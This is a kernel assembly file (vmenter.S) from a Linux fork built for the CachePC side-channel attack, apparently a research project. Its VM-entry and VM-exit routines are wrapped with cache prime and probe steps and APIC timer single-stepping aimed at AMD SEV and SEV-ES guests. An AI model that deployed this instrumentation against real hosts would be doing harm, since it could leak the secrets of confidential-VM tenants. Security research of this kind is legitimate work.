cachepc-linux

Fork of AMDESE/linux with modifications for CachePC side-channel attack
git clone https://git.sinitax.com/sinitax/cachepc-linux
Log | Files | Refs | README | LICENSE | sfeed.txt

vmenter.S (6306B)


      1/* SPDX-License-Identifier: GPL-2.0 */
      2#include <linux/linkage.h>
      3#include <asm/asm.h>
      4#include <asm/bitsperlong.h>
      5#include <asm/kvm_vcpu_regs.h>
      6#include <asm/nospec-branch.h>
      7
      8#define WORD_SIZE (BITS_PER_LONG / 8)
      9
     10/* Intentionally omit RAX as it's context switched by hardware */
     11#define VCPU_RCX	__VCPU_REGS_RCX * WORD_SIZE
     12#define VCPU_RDX	__VCPU_REGS_RDX * WORD_SIZE
     13#define VCPU_RBX	__VCPU_REGS_RBX * WORD_SIZE
     14/* Intentionally omit RSP as it's context switched by hardware */
     15#define VCPU_RBP	__VCPU_REGS_RBP * WORD_SIZE
     16#define VCPU_RSI	__VCPU_REGS_RSI * WORD_SIZE
     17#define VCPU_RDI	__VCPU_REGS_RDI * WORD_SIZE
     18
     19#ifdef CONFIG_X86_64
     20#define VCPU_R8		__VCPU_REGS_R8  * WORD_SIZE
     21#define VCPU_R9		__VCPU_REGS_R9  * WORD_SIZE
     22#define VCPU_R10	__VCPU_REGS_R10 * WORD_SIZE
     23#define VCPU_R11	__VCPU_REGS_R11 * WORD_SIZE
     24#define VCPU_R12	__VCPU_REGS_R12 * WORD_SIZE
     25#define VCPU_R13	__VCPU_REGS_R13 * WORD_SIZE
     26#define VCPU_R14	__VCPU_REGS_R14 * WORD_SIZE
     27#define VCPU_R15	__VCPU_REGS_R15 * WORD_SIZE
     28#endif
     29
     30.section .noinstr.text, "ax"
     31
     32#include "../cachepc/macro.S"
     33
     34.macro apply_regs func
     35	\func %rax %xmm0
     36	\func %rbx %xmm1
     37	\func %rcx %xmm2
     38	\func %rdx %xmm3
     39	\func %rbp %xmm4
     40	\func %rsp %xmm5
     41	\func %rdi %xmm6
     42	\func %rsi %xmm7
     43	\func %r8  %xmm8
     44	\func %r9  %xmm9
     45	\func %r10 %xmm10
     46	\func %r11 %xmm11
     47	\func %r12 %xmm12
     48	\func %r13 %xmm13
     49	\func %r14 %xmm14
     50.endm
     51
     52.macro save_reg src dst
     53	movq \src, \dst
     54.endm
     55
     56.macro swap_reg src dst
     57	movq \src, %r15
     58	movq \dst, \src
     59	movq %r15, \dst
     60.endm
     61
     62.macro save_vm
     63	apply_regs save_reg
     64.endm
     65
     66.macro exit_vm
     67	apply_regs swap_reg
     68.endm
     69
     70.macro enter_vm
     71	apply_regs swap_reg
     72	movq %xmm15, %r15 # fixup tmp reg
     73.endm
     74
     75.macro wrap_prime name
     76	exit_vm
     77
     78	# read vars before prime
     79	xor %rax, %rax
     80	movb cpc_apic_oneshot, %al
     81	mov %rax, %r11
     82	mov cpc_apic_timer, %eax
     83	mov %rax, %r12
     84	mov cpc_apic_timer_softdiv, %eax
     85	mov %rax, %r13
     86	movb cpc_prime_probe, %al
     87	mov %rax, %r14
     88
     89	# do prime
     90	mov %r14, %rax
     91	cmp $0, %al
     92	je skip_prime_\name
     93	wbinvd
     94	mov cpc_ds, %r9
     95	prime \name %r9 %r10 %r8
     96skip_prime_\name:
     97
     98	# do oneshot
     99	mov %r11, %rax
    100	cmp $0, %al
    101	je skip_apic_\name
    102	# asm from cpc_apic_oneshot_run
    103	mov $0xec, %edx
    104	mov %edx, 0xffffffffff5fd320
    105	mov $0x0b, %edx
    106	mov %edx, 0xffffffffff5fd3e0
    107	xor %edx, %edx
    108	mov %r12, %rax
    109	div %r13
    110	mov %eax, 0xffffffffff5fd380
    111skip_apic_\name:
    112
    113	enter_vm
    114.endm
    115
    116.macro wrap_probe name
    117	exit_vm
    118
    119	# do probe
    120	mov %r14, %rax
    121	cmp $0, %al
    122	je skip_probe_\name
    123	probe \name $CPC_L1MISS_PMC %r8 %r9 %r10 %r11 %r12
    124skip_probe_\name:
    125
    126	enter_vm
    127.endm
    128
    129
    130/**
    131 * __svm_vcpu_run - Run a vCPU via a transition to SVM guest mode
    132 * @vmcb_pa:	unsigned long
    133 * @regs:	unsigned long * (to guest registers)
    134 */
    135SYM_FUNC_START(__svm_vcpu_run)
    136	save_vm
    137
    138	push %_ASM_BP
    139#ifdef CONFIG_X86_64
    140	push %r15
    141	push %r14
    142	push %r13
    143	push %r12
    144#else
    145	push %edi
    146	push %esi
    147#endif
    148	push %_ASM_BX
    149
    150	/* Save @regs. */
    151	push %_ASM_ARG2
    152
    153	/* Save @vmcb. */
    154	push %_ASM_ARG1
    155
    156	/* Move @regs to RAX. */
    157	mov %_ASM_ARG2, %_ASM_AX
    158
    159	/* Load guest registers. */
    160	mov VCPU_RCX(%_ASM_AX), %_ASM_CX
    161	mov VCPU_RDX(%_ASM_AX), %_ASM_DX
    162	mov VCPU_RBX(%_ASM_AX), %_ASM_BX
    163	mov VCPU_RBP(%_ASM_AX), %_ASM_BP
    164	mov VCPU_RSI(%_ASM_AX), %_ASM_SI
    165	mov VCPU_RDI(%_ASM_AX), %_ASM_DI
    166#ifdef CONFIG_X86_64
    167	mov VCPU_R8 (%_ASM_AX),  %r8
    168	mov VCPU_R9 (%_ASM_AX),  %r9
    169	mov VCPU_R10(%_ASM_AX), %r10
    170	mov VCPU_R11(%_ASM_AX), %r11
    171	mov VCPU_R12(%_ASM_AX), %r12
    172	mov VCPU_R13(%_ASM_AX), %r13
    173	mov VCPU_R14(%_ASM_AX), %r14
    174	mov VCPU_R15(%_ASM_AX), %r15
    175#endif
    176
    177	/* "POP" @vmcb to RAX. */
    178	pop %_ASM_AX
    179
    180	wrap_prime sev_vcpu_run
    181
    182	sti
    1831:	vmrun %_ASM_AX
    1842:	cli
    185
    186	wrap_probe sev_vcpu_run
    187
    188#ifdef CONFIG_RETPOLINE
    189	/* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */
    190	FILL_RETURN_BUFFER %_ASM_AX, RSB_CLEAR_LOOPS, X86_FEATURE_RETPOLINE
    191#endif
    192
    193	/* "POP" @regs to RAX. */
    194	pop %_ASM_AX
    195
    196	/* Save all guest registers.  */
    197	mov %_ASM_CX,   VCPU_RCX(%_ASM_AX)
    198	mov %_ASM_DX,   VCPU_RDX(%_ASM_AX)
    199	mov %_ASM_BX,   VCPU_RBX(%_ASM_AX)
    200	mov %_ASM_BP,   VCPU_RBP(%_ASM_AX)
    201	mov %_ASM_SI,   VCPU_RSI(%_ASM_AX)
    202	mov %_ASM_DI,   VCPU_RDI(%_ASM_AX)
    203#ifdef CONFIG_X86_64
    204	mov %r8,  VCPU_R8 (%_ASM_AX)
    205	mov %r9,  VCPU_R9 (%_ASM_AX)
    206	mov %r10, VCPU_R10(%_ASM_AX)
    207	mov %r11, VCPU_R11(%_ASM_AX)
    208	mov %r12, VCPU_R12(%_ASM_AX)
    209	mov %r13, VCPU_R13(%_ASM_AX)
    210	mov %r14, VCPU_R14(%_ASM_AX)
    211	mov %r15, VCPU_R15(%_ASM_AX)
    212#endif
    213
    214	/*
    215	 * Clear all general purpose registers except RSP and RAX to prevent
    216	 * speculative use of the guest's values, even those that are reloaded
    217	 * via the stack.  In theory, an L1 cache miss when restoring registers
    218	 * could lead to speculative execution with the guest's values.
    219	 * Zeroing XORs are dirt cheap, i.e. the extra paranoia is essentially
    220	 * free.  RSP and RAX are exempt as they are restored by hardware
    221	 * during VM-Exit.
    222	 */
    223	xor %ecx, %ecx
    224	xor %edx, %edx
    225	xor %ebx, %ebx
    226	xor %ebp, %ebp
    227	xor %esi, %esi
    228	xor %edi, %edi
    229#ifdef CONFIG_X86_64
    230	xor %r8d,  %r8d
    231	xor %r9d,  %r9d
    232	xor %r10d, %r10d
    233	xor %r11d, %r11d
    234	xor %r12d, %r12d
    235	xor %r13d, %r13d
    236	xor %r14d, %r14d
    237	xor %r15d, %r15d
    238#endif
    239
    240	pop %_ASM_BX
    241
    242#ifdef CONFIG_X86_64
    243	pop %r12
    244	pop %r13
    245	pop %r14
    246	pop %r15
    247#else
    248	pop %esi
    249	pop %edi
    250#endif
    251	pop %_ASM_BP
    252	RET
    253
    2543:	cmpb $0, kvm_rebooting
    255	jne 2b
    256	ud2
    257
    258	_ASM_EXTABLE(1b, 3b)
    259
    260SYM_FUNC_END(__svm_vcpu_run)
    261
    262/**
    263 * __svm_sev_es_vcpu_run - Run a SEV-ES vCPU via a transition to SVM guest mode
    264 * @vmcb_pa:	unsigned long
    265 */
    266SYM_FUNC_START(__svm_sev_es_vcpu_run)
    267	save_vm
    268
    269	push %_ASM_BP
    270#ifdef CONFIG_X86_64
    271	push %r15
    272	push %r14
    273	push %r13
    274	push %r12
    275#else
    276	push %edi
    277	push %esi
    278#endif
    279	push %_ASM_BX
    280
    281	/* Move @vmcb to RAX. */
    282	mov %_ASM_ARG1, %_ASM_AX
    283
    284	wrap_prime sev_es_vcpu_run
    285
    286	sti
    2871:	vmrun %_ASM_AX
    2882:	cli
    289
    290	# in sev-es the cpu register state is not restored after vmrun..
    291	# xmm regs have been cleared so we need to do an extra accesses
    292	movq cpc_ds_probe, %xmm8
    293	movq cpc_prime_probe, %xmm14
    294	wrap_probe sev_es_vcpu_run
    295
    296#ifdef CONFIG_RETPOLINE
    297	/* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */
    298	FILL_RETURN_BUFFER %_ASM_AX, RSB_CLEAR_LOOPS, X86_FEATURE_RETPOLINE
    299#endif
    300
    301	pop %_ASM_BX
    302
    303#ifdef CONFIG_X86_64
    304	pop %r12
    305	pop %r13
    306	pop %r14
    307	pop %r15
    308#else
    309	pop %esi
    310	pop %edi
    311#endif
    312	pop %_ASM_BP
    313	RET
    314
    3153:	cmpb $0, kvm_rebooting
    316	jne 2b
    317	ud2
    318
    319	_ASM_EXTABLE(1b, 3b)
    320
    321SYM_FUNC_END(__svm_sev_es_vcpu_run)